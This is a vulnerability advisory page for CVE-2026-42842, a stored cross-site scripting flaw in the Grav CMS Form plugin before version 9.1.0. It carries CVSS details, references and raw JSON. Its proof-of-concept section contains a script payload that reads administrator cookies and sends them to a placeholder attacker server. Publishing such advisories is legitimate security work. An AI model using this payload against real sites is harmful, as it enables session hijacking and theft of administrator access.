Security Vulnerability Report
CVE-2026-42842 CVSS 5.4 MEDIUM

Published: 2026-05-11 17:16:34
Last Modified: 2026-05-11 19:16:24

Description

The form plugin for Grav adds the ability to create and use forms. Prior to 9.1.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Grav CMS Form plugin's select field template. Taxonomy tag and category values are rendered with the Twig |raw filter in the admin panel, bypassing the global autoescape protection. An editor-level user can inject arbitrary JavaScript that executes in any administrator's browser session when they view or edit any page in the admin panel. This vulnerability is fixed in 9.1.0.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Grav CMS Form Plugin < 9.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- PoC for CVE-2026-42842: Stored XSS in Grav CMS Form Plugin
     Description: Inject this payload into the Select field (Taxonomy/Category values)
     in the Form plugin configuration. -->
<script>
// Example payload: Steal admin cookies
(function () {
  var cookies = document.cookie;
  var xhr = new XMLHttpRequest();
  xhr.open('GET', 'https://attacker-controlled-server/log?c=' + encodeURIComponent(cookies), true);
  xhr.send();
  alert('XSS Triggered - CVE-2026-42842');
})();
</script>
```

References

Commit in grav-plugin-form: https://github.com/getgrav/grav-plugin-form/commit/6bffb4c98be468a155d1656544ec45bb4a443957
GitHub Security Advisory: https://github.com/getgrav/grav/security/advisories/GHSA-c2q3-p4jr-c55f
Weakness: CWE-79

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-42842",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-11T17:16:33.873",
    "lastModified": "2026-05-11T19:16:24.190",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The form plugin for Grav adds the ability to create and use forms. Prior to 9.1.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Grav CMS Form plugin's select field template. Taxonomy tag and category values are rendered with the Twig |raw filter in the admin panel, bypassing the global autoescape protection. An editor-level user can inject arbitrary JavaScript that executes in any administrator's browser session when they view or edit any page in the admin panel. This vulnerability is fixed in 9.1.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/getgrav/grav-plugin-form/commit/6bffb4c98be468a155d1656544ec45bb4a443957",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/getgrav/grav/security/advisories/GHSA-c2q3-p4jr-c55f",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/getgrav/grav/security/advisories/GHSA-c2q3-p4jr-c55f",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}
```